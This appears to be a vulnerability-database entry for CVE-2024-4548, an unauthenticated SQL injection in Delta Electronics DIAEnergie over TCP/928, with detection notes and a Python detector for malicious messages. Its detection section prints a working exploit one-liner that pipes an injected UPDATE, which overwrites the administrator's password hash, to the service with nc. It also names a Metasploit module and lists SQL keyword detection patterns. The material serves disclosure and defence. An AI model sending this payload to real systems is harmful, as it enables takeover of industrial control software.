CVE-2024-4548
Published 2024-05-06
Priority P179 | critical | 9.8 CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 29.43% (97.9th percentile)
An SQLi vulnerability exists in Delta Electronics DIAEnergie v1.10.1.8610 and prior when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into 4 fields using the '~' character as the separator. An unauthenticated remote attacker can perform SQLi via the fourth field.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| delta_electronics | diaenergie | <= 1.10.1.8610 | — |
| deltaww | diaenergie | < 1.10.01.004 | 1.10.01.004 |
Detection & IOCs
Command: echo -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'uV5SW+n71LS/S/Bjd426N1hNF1r70booEbICe8yhAxc=' WHERE uid=1;--" | nc 928
- Monitor TCP port 928 for unauthenticated connections sending messages starting with 'RecalculateHDMWYC'; the fourth '~'-delimited field is the SQLi injection point.
- Detect SQL injection payloads in the fourth field of 'RecalculateHDMWYC' messages on TCP/928, specifically patterns containing SQL keywords such as INSERT, UPDATE, or stacked queries (e.g., ');).
- Exploitation results in command execution as NT AUTHORITY\SYSTEM via CEBC service; monitor for unexpected child processes spawned by CEBC.exe.
- A public Metasploit module exists for this vulnerability (exploits/windows/scada/diaenergie_sqli); monitor for exploitation attempts matching that module's traffic pattern on TCP/928.
- The vulnerability is unauthenticated: no credentials are required to exploit TCP/928; the service must be network-accessible for exploitation to succeed.
- Affected versions are DIAEnergie v1.10.1.8610 and prior; patched version is v1.10.01.004 or later.
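The fourth-field check from the detection notes above, written as an added example (not code from this page, the vendor, or any published rule) that can be run over payloads reassembled from TCP/928 captures. It assumes a legitimate fourth field is a numeric ID or comma-separated list of IDs and that timestamps use the format in the sample message; the function name and the sample payloads are constructed for illustration.

```python
import re
from typing import Optional

# Assumption: a legitimate fourth field is a numeric ID or comma-separated IDs.
ALLOWED_FIELD4 = re.compile(r"\d+(?:\s*,\s*\d+)*")
# Assumption: timestamps use the format seen in the page's sample message.
TIMESTAMP = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")
# SQL keywords, stacked-query separators, comment and quote markers.
SQL_MARKERS = re.compile(
    r"\b(?:insert|update|delete|select|drop|exec)\b|;|--|/\*|'|\)", re.I)

def inspect_message(payload: bytes) -> Optional[dict]:
    """Return a finding for one TCP/928 payload, or None if it is another message type."""
    text = payload.decode("utf-8", errors="replace").strip()
    if not text.startswith("RecalculateHDMWYC~"):
        return None
    # maxsplit=3 keeps any extra '~' inside field 4 so it is inspected, not dropped.
    parts = text.split("~", 3)
    reasons, field4 = [], ""
    if len(parts) < 4:
        reasons.append("fewer than 4 fields")
    else:
        field4 = parts[3]
        for name, value in (("start", parts[1]), ("end", parts[2])):
            if not TIMESTAMP.fullmatch(value):
                reasons.append(f"{name} field is not a timestamp")
        if not ALLOWED_FIELD4.fullmatch(field4):
            reasons.append("field 4 is not a numeric ID list")
        markers = sorted({m.group(0).lower() for m in SQL_MARKERS.finditer(field4)})
        if markers:
            reasons.append("SQL markers in field 4: " + " ".join(markers))
    return {"suspicious": bool(reasons), "reasons": reasons, "field4": field4}

# Constructed sample payloads (the hash value is replaced by a placeholder).
BENIGN = b"RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1"
STACKED = (b"RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~"
           b"1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'<placeholder>' WHERE uid=1;--")
TRUNCATED = b"RecalculateHDMWYC~2024-01-01 00:00:00"
OTHER = b"SomeOtherMessage~1~2"

if __name__ == "__main__":
    for sample in (BENIGN, STACKED, TRUNCATED, OTHER):
        print(sample[:40], "->", inspect_message(sample))
```

The allowlist check catches payloads that avoid the listed keywords, so tune `ALLOWED_FIELD4` against field values observed from legitimate clients before alerting on it.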